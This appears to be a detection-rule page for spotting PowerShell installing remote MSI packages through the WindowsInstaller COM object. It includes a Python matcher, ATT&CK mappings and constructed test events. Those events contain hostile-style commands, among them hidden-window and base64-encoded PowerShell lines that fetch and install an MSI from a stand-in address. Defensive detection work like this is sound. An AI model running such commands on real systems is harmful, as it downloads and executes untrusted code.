
PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)

Detects the execution of PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (WindowsInstaller.Installer) from a remote location. This could indicate malicious software deployment or lateral movement using Windows Installer functionality. Using the WindowsInstaller COM object rather than msiexec.exe may be an attempt to evade detections that key on the msiexec command line.
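As an added example (not the Sigma rule's own selection logic and not code from this page), the following Python approximates the rule's intent and runs it over constructed process-creation events: a PowerShell host image, the string WindowsInstaller.Installer together with an InstallProduct call, and a remote package source (HTTP(S), FTP or a UNC share). The image paths, command lines, the address 203.0.113.5 and the share name are constructed for illustration. It also decodes -EncodedCommand payloads before matching, since that is the cheapest way to hide the COM call from a plain substring check.

```python
"""Flag PowerShell launches that install an MSI through the WindowsInstaller.Installer
COM object from a remote location (HTTP(S), FTP or UNC path).

Approximation of the rule's intent written for this page, not the Sigma rule's exact
selection logic. The sample events below are constructed, not real telemetry.
"""
import base64
import re

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# URL schemes or a UNC share prefix (\\host\) point at a remote package source.
REMOTE_LOCATION = re.compile(r"(https?://|ftp://|\\\\[^\\\s'\"]+\\)", re.IGNORECASE)

# -e / -enc / -EncodedCommand followed by the base64 payload.
ENC_FLAG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def expand_encoded(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload (UTF-16LE) so matching sees it."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return cmd + " " + decoded


def is_remote_com_msi_install(image: str, cmd: str) -> bool:
    """True when a PowerShell host calls WindowsInstaller.Installer.InstallProduct on a remote path."""
    if image.rsplit("\\", 1)[-1].lower() not in POWERSHELL_IMAGES:
        return False
    text = expand_encoded(cmd)
    low = text.lower()
    if "windowsinstaller.installer" not in low or "installproduct" not in low:
        return False
    return REMOTE_LOCATION.search(text) is not None


def scan(events):
    """Return the ids of matching events, in input order."""
    return [e["id"] for e in events if is_remote_com_msi_install(e["image"], e["cmd"])]


# Constructed image paths.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PWSH = r"C:\Program Files\PowerShell\7\pwsh.exe"
MSIEXEC = r"C:\Windows\System32\msiexec.exe"

# Constructed: the same COM install hidden behind -EncodedCommand (UTF-16LE, base64).
_ENCODED = base64.b64encode(
    "$i=New-Object -ComObject WindowsInstaller.Installer;"
    "$i.InstallProduct('https://203.0.113.5/a.msi')".encode("utf-16-le")
).decode()

# Constructed process-creation events (image + command line), not real telemetry.
SAMPLE_EVENTS = [
    # 1: plain COM install from HTTP, should fire
    {"id": 1, "image": PS, "cmd": 'powershell -nop -w hidden -c "$i=New-Object -ComObject WindowsInstaller.Installer;$i.InstallProduct(\'http://203.0.113.5/update.msi\')"'},
    # 2: same COM call but a local package, should not fire
    {"id": 2, "image": PWSH, "cmd": 'pwsh -c "$i = New-Object -ComObject WindowsInstaller.Installer; $i.InstallProduct(\'C:\\Temp\\app.msi\')"'},
    # 3: remote MSI via msiexec, out of scope for this rule (msiexec has its own rules)
    {"id": 3, "image": MSIEXEC, "cmd": "msiexec /i https://203.0.113.5/update.msi /qn"},
    # 4: COM object obtained via Activator/GetTypeFromProgID, UNC source, should fire
    {"id": 4, "image": PS, "cmd": 'powershell -c "([Activator]::CreateInstance([Type]::GetTypeFromProgID(\'WindowsInstaller.Installer\'))).InstallProduct(\'\\\\fileserver\\share\\tool.msi\')"'},
    # 5: ProgID string present but no InstallProduct call, should not fire
    {"id": 5, "image": PS, "cmd": 'powershell -c "Get-Content WindowsInstaller.Installer.txt"'},
    # 6: encoded command, fires only because the payload is decoded first
    {"id": 6, "image": PS, "cmd": f"powershell -nop -enc {_ENCODED}"},
]

if __name__ == "__main__":
    print("matched event ids:", scan(SAMPLE_EVENTS))
```

This only sees what reaches the process command line. If the COM call lives in a .ps1 file, is piped over stdin, or is built from string fragments at run time, the process-creation event carries none of the indicators; PowerShell Script Block Logging (Event ID 4104) records the de-obfuscated script text and is the complementary source for the same logic.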

| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0) | Sigma-Rules | Ingress Tool Transfer - T1105 (e6919abc-99f9-4c6c-95a5-14761e7b2add) | Attack Pattern | 1 |
| PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0) | Sigma-Rules | PowerShell - T1059.001 (970a3432-3237-47ad-bcca-7d8cbb217736) | Attack Pattern | 1 |
| PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0) | Sigma-Rules | System Binary Proxy Execution - T1218 (457c7820-d331-465a-915e-42f85500ccc4) | Attack Pattern | 1 |
| Command and Scripting Interpreter - T1059 (7385dfaf-6886-4229-9ecd-6fd678040830) | Attack Pattern | PowerShell - T1059.001 (970a3432-3237-47ad-bcca-7d8cbb217736) | Attack Pattern | 2 |